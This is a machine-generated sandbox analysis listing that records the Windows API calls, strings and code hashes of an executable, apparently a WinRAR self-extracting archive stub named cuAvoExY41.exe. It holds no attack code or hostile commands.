                                                          • Instruction ID: f037bb07d516f963d14bf11471a837113ca886380d2cea24f2782d825216c9dd
                                                          • Opcode Fuzzy Hash: 47a1e287ba7ba8d37838c7041456f70c179786afec6776a05e8dbd4a62d7f55b
                                                          • Instruction Fuzzy Hash: A041B234E00258AFCF10DF28C895A9E7BB6EF54324F188056E915AB392D735DA05FBD2
                                                          APIs
                                                          • ShowWindow.USER32(?,00000000), ref: 00FC9EEE
                                                          • GetWindowRect.USER32(?,00000000), ref: 00FC9F44
                                                          • ShowWindow.USER32(?,00000005,00000000), ref: 00FC9FDB
                                                          • SetWindowTextW.USER32(?,00000000), ref: 00FC9FE3
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00FC9FF9
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$Show$RectText
                                                          • String ID: RarHtmlClassName
                                                          • API String ID: 3937224194-1658105358
                                                          • Opcode ID: 256837f10a6a88c83d86ab663bc510fce2c8858bc6094e961fa0d5a04d21d306
                                                          • Instruction ID: 8e83a8ee55cdce5d54bb4e7c720eb67f260a1bb05b5cdda7c144e10aef57d3b4
                                                          • Opcode Fuzzy Hash: 256837f10a6a88c83d86ab663bc510fce2c8858bc6094e961fa0d5a04d21d306
                                                          • Instruction Fuzzy Hash: 8841F032408305AFCB209F649D4EF2B7BB8FF48325F04451DF9499914ADB78E814DB62
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                          • API String ID: 176396367-3743748572
                                                          • Opcode ID: bb2517e4c8023fe51216b60a2721ed771da8422f9220be66f4057c518895cf7d
                                                          • Instruction ID: d1d978b319e366641e2a125ec59bf6c7b6912f3384a932d40a110ac0cf068845
                                                          • Opcode Fuzzy Hash: bb2517e4c8023fe51216b60a2721ed771da8422f9220be66f4057c518895cf7d
                                                          • Instruction Fuzzy Hash: B3315E32A4834756DA30AB549D47F7673A4EB90730F54441FF582872C0FAE8ED44A3A2
                                                          APIs
                                                            • Part of subcall function 00FDC868: _free.LIBCMT ref: 00FDC891
                                                          • _free.LIBCMT ref: 00FDC8F2
                                                            • Part of subcall function 00FD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?), ref: 00FD8DE2
                                                            • Part of subcall function 00FD8DCC: GetLastError.KERNEL32(?,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?,?), ref: 00FD8DF4
                                                          • _free.LIBCMT ref: 00FDC8FD
                                                          • _free.LIBCMT ref: 00FDC908
                                                          • _free.LIBCMT ref: 00FDC95C
                                                          • _free.LIBCMT ref: 00FDC967
                                                          • _free.LIBCMT ref: 00FDC972
                                                          • _free.LIBCMT ref: 00FDC97D
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                          • Instruction ID: b3384083daa3888b31c1d04cca12c787282804e2537ecf6a62ca5e7a30c56488
                                                          • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                          • Instruction Fuzzy Hash: 8F110D71580B05BAE520B7B1CC07FCB7BAE9F44B00F484D16B2DD66292DA69A506F790
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00FCE669,00FCE5CC,00FCE86D), ref: 00FCE605
                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00FCE61B
                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00FCE630
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                          • API String ID: 667068680-1718035505
                                                          • Opcode ID: 4f551330794e5fc359169f6bda56b51ffa3c357704af9fdc9e1e19d6ee511853
                                                          • Instruction ID: 6bb045e84c182a83e21283db7986d5d6ba86357af520652cfebfcdc4a8a9fae6
                                                          • Opcode Fuzzy Hash: 4f551330794e5fc359169f6bda56b51ffa3c357704af9fdc9e1e19d6ee511853
                                                          • Instruction Fuzzy Hash: B1F0CD32F727A39B0F314EB5AE8BF6632C86A25B69304043DEA45D7100EB29CD507B91
                                                          APIs
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FC14C2
                                                            • Part of subcall function 00FBB146: GetVersionExW.KERNEL32(?), ref: 00FBB16B
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FC14E6
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FC1500
                                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00FC1513
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FC1523
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FC1533
                                                          Similarity
                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                          • String ID:
                                                          • API String ID: 2092733347-0
                                                          • Opcode ID: ced8de4a41a793ab6a7c3e5392817587ed8ab069ae862b36412772bd4af9b761
                                                          • Instruction ID: 8d08874e61723ebaffe4ade9b34a6a8caba864ab2985a9a0d682cd08507ca1a9
                                                          • Opcode Fuzzy Hash: ced8de4a41a793ab6a7c3e5392817587ed8ab069ae862b36412772bd4af9b761
                                                          • Instruction Fuzzy Hash: 8C31F87550834AABC704DFA8C88999BB7F8BF98714F044A1EF995C3210E734D509CBA6
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,00FD2AF1,00FD02FC,00FCFA34), ref: 00FD2B08
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FD2B16
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FD2B2F
                                                          • SetLastError.KERNEL32(00000000,00FD2AF1,00FD02FC,00FCFA34), ref: 00FD2B81
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 12bf2fcaf916953861af802aff3d58defd37f67a8f2427e92f803c3d4fa85e49
                                                          • Instruction ID: 0b20d68f5fcb33b035d56043b96eda64819aa76e29ecccf39476da576e3cbddd
                                                          • Opcode Fuzzy Hash: 12bf2fcaf916953861af802aff3d58defd37f67a8f2427e92f803c3d4fa85e49
                                                          • Instruction Fuzzy Hash: A10147325083192EA7542B747CC9A2A3B4BEFA27747380B3BF220493F0EF914C00B580
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00FF1030,00FD4674,00FF1030,?,?,00FD3F73,00000050,?,00FF1030,00000200), ref: 00FD97E9
                                                          • _free.LIBCMT ref: 00FD981C
                                                          • _free.LIBCMT ref: 00FD9844
                                                          • SetLastError.KERNEL32(00000000,?,00FF1030,00000200), ref: 00FD9851
                                                          • SetLastError.KERNEL32(00000000,?,00FF1030,00000200), ref: 00FD985D
                                                          • _abort.LIBCMT ref: 00FD9863
                                                          Similarity
                                                          • API ID: ErrorLast$_free$_abort
                                                          • String ID:
                                                          • API String ID: 3160817290-0
                                                          • Opcode ID: e09ea4c2da2cce698efa89adf0647db91a746c0dcb68c6e5ba559610b5c03b75
                                                          • Instruction ID: 86b37ca7d2e30ad8f2588dec015920d388f56420415cadc09ae2db8278fb72f4
                                                          • Opcode Fuzzy Hash: e09ea4c2da2cce698efa89adf0647db91a746c0dcb68c6e5ba559610b5c03b75
                                                          • Instruction Fuzzy Hash: 23F0F43650860166C75233A4BC4EB5F3A678FD2F70F2C003AF624973D6EEA88802B525
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FCDC47
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FCDC61
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCDC72
                                                          • TranslateMessage.USER32(?), ref: 00FCDC7C
                                                          • DispatchMessageW.USER32(?), ref: 00FCDC86
                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FCDC91
                                                          Similarity
                                                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                          • String ID:
                                                          • API String ID: 2148572870-0
                                                          • Opcode ID: d5b8b8627e202071ba1a99f57cbcf1ce29674ca4f1f6a02b8db37f8edccddeb1
                                                          • Instruction ID: 104cf5ce1cfbbb037bb011c5eadbf77bb929bfe6daf29f369dac4cf66b2b3842
                                                          • Opcode Fuzzy Hash: d5b8b8627e202071ba1a99f57cbcf1ce29674ca4f1f6a02b8db37f8edccddeb1
                                                          • Instruction Fuzzy Hash: 31F08C72E00219BBCF20ABE1DD4DEDF7FBDEF417A1B004021B50AE6004D6798546C7A0
                                                          APIs
                                                            • Part of subcall function 00FC05DA: _wcslen.LIBCMT ref: 00FC05E0
                                                            • Part of subcall function 00FBB92D: _wcsrchr.LIBVCRUNTIME ref: 00FBB944
                                                          • _wcslen.LIBCMT ref: 00FBC197
                                                          • _wcslen.LIBCMT ref: 00FBC1DF
                                                          Similarity
                                                          • API ID: _wcslen$_wcsrchr
                                                          • String ID: .exe$.rar$.sfx
                                                          • API String ID: 3513545583-31770016
                                                          • Opcode ID: 260856102646adfa25fd80c3899fff477325dd470f2b65d9482bec1d8032ad42
                                                          • Instruction ID: a0a336197978a1008649b71cc9153b08ffab74cfd160696d94e652137df2d664
                                                          • Opcode Fuzzy Hash: 260856102646adfa25fd80c3899fff477325dd470f2b65d9482bec1d8032ad42
                                                          • Instruction Fuzzy Hash: B0412822904351D6C731BF3A8C06EBB73A8EF41764F14090EF991AB182EB548D82FBD5
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000800,?), ref: 00FCCE9D
                                                            • Part of subcall function 00FBB690: _wcslen.LIBCMT ref: 00FBB696
                                                          • _swprintf.LIBCMT ref: 00FCCED1
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          • SetDlgItemTextW.USER32(?,00000066,00FF946A), ref: 00FCCEF1
                                                          • EndDialog.USER32(?,00000001), ref: 00FCCFFE
                                                          Similarity
                                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                          • String ID: %s%s%u
                                                          • API String ID: 110358324-1360425832
                                                          • Opcode ID: aad132f8ef9a88c974cb389392abd730e2d5ed6fde1d3cb71338622aa79183ca
                                                          • Instruction ID: 81cd084641bdebc8c97495730440ae20675eaf369f41e9d32ec61ad5caa3f7a5
                                                          • Opcode Fuzzy Hash: aad132f8ef9a88c974cb389392abd730e2d5ed6fde1d3cb71338622aa79183ca
                                                          • Instruction Fuzzy Hash: 5D41647190015AA9DF25DB90CD46FEE77ACEF04350F4080AAF909E7051EB749A44EF71
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00FBBB27
                                                          • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00FBA275,?,?,00000800,?,00FBA23A,?,00FB755C), ref: 00FBBBC5
                                                          • _wcslen.LIBCMT ref: 00FBBC3B
                                                          Similarity
                                                          • API ID: _wcslen$CurrentDirectory
                                                          • String ID: UNC$\\?\
                                                          • API String ID: 3341907918-253988292
                                                          • Opcode ID: db2af6d996475417477b4708e23987912516ce5b680ead091330d66b8fd20a69
                                                          • Instruction ID: de8f7f0e6d7977bd73c74fcd58e10188221a8dd67cc7b9a14ce9f47a64113a16
                                                          • Opcode Fuzzy Hash: db2af6d996475417477b4708e23987912516ce5b680ead091330d66b8fd20a69
                                                          • Instruction Fuzzy Hash: 7841C371800256B6CB21EF22CD06EEE7B69AF443A0F048465F954A3151DBB4DA91FE60
                                                          APIs
                                                          • LoadBitmapW.USER32(00000065), ref: 00FCB6ED
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00FCB712
                                                          • DeleteObject.GDI32(00000000), ref: 00FCB744
                                                          • DeleteObject.GDI32(00000000), ref: 00FCB767
                                                            • Part of subcall function 00FCA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FCB73D,00000066), ref: 00FCA6D5
                                                            • Part of subcall function 00FCA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA6EC
                                                            • Part of subcall function 00FCA6C2: LoadResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA703
                                                            • Part of subcall function 00FCA6C2: LockResource.KERNEL32(00000000,?,?,?,00FCB73D,00000066), ref: 00FCA712
                                                            • Part of subcall function 00FCA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FCB73D,00000066), ref: 00FCA72D
                                                            • Part of subcall function 00FCA6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00FCB73D,00000066), ref: 00FCA73E
                                                            • Part of subcall function 00FCA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FCA7A7
                                                            • Part of subcall function 00FCA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00FCA7C6
                                                            • Part of subcall function 00FCA6C2: GlobalFree.KERNEL32(00000000), ref: 00FCA7CD
                                                          Similarity
                                                          • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                          • String ID: ]
                                                          • API String ID: 1428510222-3352871620
                                                          • Opcode ID: 18de3247cf7a3dc7811a6b3969d7909220691bf9cc6281356680c54c02d524ac
                                                          • Instruction ID: 2199529e258fe519f1b86a9b83b476d06bd1e08e70d9c3692341e2dd6bcecda4
                                                          • Opcode Fuzzy Hash: 18de3247cf7a3dc7811a6b3969d7909220691bf9cc6281356680c54c02d524ac
                                                          • Instruction Fuzzy Hash: C201C43A90010BA7C72277745E0BF7F7AB9AFC0766F090018FD40B7285DF6A8C056A61
                                                          APIs
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • EndDialog.USER32(?,00000001), ref: 00FCD64B
                                                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00FCD661
                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00FCD675
                                                          • SetDlgItemTextW.USER32(?,00000068), ref: 00FCD684
                                                          Similarity
                                                          • API ID: ItemText$DialogWindow
                                                          • String ID: RENAMEDLG
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FD7E24,00000000,?,00FD7DC4,00000000,00FEC300,0000000C,00FD7F1B,00000000,00000002), ref: 00FD7E93
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FD7EA6
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00FD7E24,00000000,?,00FD7DC4,00000000,00FEC300,0000000C,00FD7F1B,00000000,00000002), ref: 00FD7EC9
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          APIs
                                                            • Part of subcall function 00FC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FC0836
                                                            • Part of subcall function 00FC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FBF2D8,Crypt32.dll,00000000,00FBF35C,?,?,00FBF33E,?,?,?), ref: 00FC0858
                                                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FBF2E4
                                                          • GetProcAddress.KERNEL32(00FF81C8,CryptUnprotectMemory), ref: 00FBF2F4
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                          APIs
                                                          Similarity
                                                          • API ID: AdjustPointer$_abort
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00FDBF39
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FDBF5C
                                                            • Part of subcall function 00FD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FDCA2C,00000000,?,00FD6CBE,?,00000008,?,00FD91E0,?,?,?), ref: 00FD8E38
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FDBF82
                                                          • _free.LIBCMT ref: 00FDBF95
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FDBFA4
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00FD91AD,00FDB188,?,00FD9813,00000001,00000364,?,00FD3F73,00000050,?,00FF1030,00000200), ref: 00FD986E
                                                          • _free.LIBCMT ref: 00FD98A3
                                                          • _free.LIBCMT ref: 00FD98CA
                                                          • SetLastError.KERNEL32(00000000,?,00FF1030,00000200), ref: 00FD98D7
                                                          • SetLastError.KERNEL32(00000000,?,00FF1030,00000200), ref: 00FD98E0
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          APIs
                                                            • Part of subcall function 00FC11CF: ResetEvent.KERNEL32(?), ref: 00FC11E1
                                                            • Part of subcall function 00FC11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00FC11F5
                                                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00FC0F21
                                                          • CloseHandle.KERNEL32(?,?), ref: 00FC0F3B
                                                          • DeleteCriticalSection.KERNEL32(?), ref: 00FC0F54
                                                          • CloseHandle.KERNEL32(?), ref: 00FC0F60
                                                          • CloseHandle.KERNEL32(?), ref: 00FC0F6C
                                                            • Part of subcall function 00FC0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00FC1206,?), ref: 00FC0FEA
                                                            • Part of subcall function 00FC0FE4: GetLastError.KERNEL32(?), ref: 00FC0FF6
                                                          Similarity
                                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                          APIs
                                                          • _free.LIBCMT ref: 00FDC817
                                                            • Part of subcall function 00FD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?), ref: 00FD8DE2
                                                            • Part of subcall function 00FD8DCC: GetLastError.KERNEL32(?,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?,?), ref: 00FD8DF4
                                                          • _free.LIBCMT ref: 00FDC829
                                                          • _free.LIBCMT ref: 00FDC83B
                                                          • _free.LIBCMT ref: 00FDC84D
                                                          • _free.LIBCMT ref: 00FDC85F
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00FC1FE5
                                                          • _wcslen.LIBCMT ref: 00FC1FF6
                                                          • _wcslen.LIBCMT ref: 00FC2006
                                                          • _wcslen.LIBCMT ref: 00FC2014
                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00FBB371,?,?,00000000,?,?,?), ref: 00FC202F
                                                          Similarity
                                                          • API ID: _wcslen$CompareString
                                                          APIs
                                                          • _free.LIBCMT ref: 00FD891E
                                                            • Part of subcall function 00FD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?), ref: 00FD8DE2
                                                            • Part of subcall function 00FD8DCC: GetLastError.KERNEL32(?,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?,?), ref: 00FD8DF4
                                                          • _free.LIBCMT ref: 00FD8930
                                                          • _free.LIBCMT ref: 00FD8943
                                                          • _free.LIBCMT ref: 00FD8954
                                                          • _free.LIBCMT ref: 00FD8965
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _swprintf
                                                          • String ID: %ls$%s: %s
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\cuAvoExY41.exe,00000104), ref: 00FD7FAE
                                                          • _free.LIBCMT ref: 00FD8079
                                                          • _free.LIBCMT ref: 00FD8083
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _free$FileModuleName
                                                          • String ID: C:\Users\user\Desktop\cuAvoExY41.exe
                                                          • API String ID: 2506810119-1573823930
                                                          • Opcode ID: d2828e74aad08f3e41808cec53a835eb57fcbf669463c17221221c0d4d5cd724
                                                          • Instruction ID: 29a99730e54a623db98de6e3e8e1233b71fc683432d3f1e3173cfad471d82690
                                                          • Opcode Fuzzy Hash: d2828e74aad08f3e41808cec53a835eb57fcbf669463c17221221c0d4d5cd724
                                                          • Instruction Fuzzy Hash: 1631A071A04208AFCB21EF95DC8499EBBBEEB84350F1840A7F44497344DB758A46EB91
                                                          APIs
                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00FD31FB
                                                          • _abort.LIBCMT ref: 00FD3306
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: EncodePointer_abort
                                                          • String ID: MOC$RCC
                                                          • API String ID: 948111806-2084237596
                                                          • Opcode ID: 41cab732f26bd1e5b68d2b9608edeb6f5576f1edff3faba4bab32ab4ac6cfa92
                                                          • Instruction ID: 3a134de4d8fbf97ec441d350369935e6682395297a8189825bf76620083a41ee
                                                          • Opcode Fuzzy Hash: 41cab732f26bd1e5b68d2b9608edeb6f5576f1edff3faba4bab32ab4ac6cfa92
                                                          • Instruction Fuzzy Hash: E0415971D00209AFCF15DF94CD81AEEBBB6FF48315F19805AFA0467211D736AA50EB52
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB7406
                                                            • Part of subcall function 00FB3BBA: __EH_prolog.LIBCMT ref: 00FB3BBF
                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00FB74CD
                                                            • Part of subcall function 00FB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FB7AAB
                                                            • Part of subcall function 00FB7A9C: GetLastError.KERNEL32 ref: 00FB7AF1
                                                            • Part of subcall function 00FB7A9C: CloseHandle.KERNEL32(?), ref: 00FB7B00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                          • API String ID: 3813983858-639343689
                                                          • Opcode ID: 367ac0c71d6cd1bffb80565d2654507bce3031f7f8fe8d488427fe73a4f88441
                                                          • Instruction ID: 650c7f74e68b3057b49db3e42f9ef1baf5ad73bca6557670c585565bb996ec64
                                                          • Opcode Fuzzy Hash: 367ac0c71d6cd1bffb80565d2654507bce3031f7f8fe8d488427fe73a4f88441
                                                          • Instruction Fuzzy Hash: AB31B271D04349AADF21EBA5CC45FEE7BA9BF85310F044019F405A7282CB789A44EF61
                                                          APIs
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • EndDialog.USER32(?,00000001), ref: 00FCAD98
                                                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00FCADAD
                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00FCADC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ItemText$DialogWindow
                                                          • String ID: ASKNEXTVOL
                                                          • API String ID: 445417207-3402441367
                                                          • Opcode ID: 6e06a98ba44bdcf7a0b8d65501083bd5ff95a19159cfafe175d32be5c0791696
                                                          • Instruction ID: e98f0fe9e1472cee28659628f36662b0cd5861478b0b0d64bf74993f72ce079a
                                                          • Opcode Fuzzy Hash: 6e06a98ba44bdcf7a0b8d65501083bd5ff95a19159cfafe175d32be5c0791696
                                                          • Instruction Fuzzy Hash: F211DA32644209AFD7219F68DD06FA677A9EB46756F000014F382DB494C76AA805A726
                                                          APIs
                                                          • __fprintf_l.LIBCMT ref: 00FBD954
                                                          • _strncpy.LIBCMT ref: 00FBD99A
                                                            • Part of subcall function 00FC1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FF1030,00000200,00FBD928,00000000,?,00000050,00FF1030), ref: 00FC1DC4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                          • String ID: $%s$@%s
                                                          • API String ID: 562999700-834177443
                                                          • Opcode ID: 1495c891eac05fef8f13db7eccd11eec4d8106463d151ecda339f4f0e7cc544c
                                                          • Instruction ID: 844b69fb39381a9c69f3a7dd248e210810556b6a0d40989c23ce130f8db85471
                                                          • Opcode Fuzzy Hash: 1495c891eac05fef8f13db7eccd11eec4d8106463d151ecda339f4f0e7cc544c
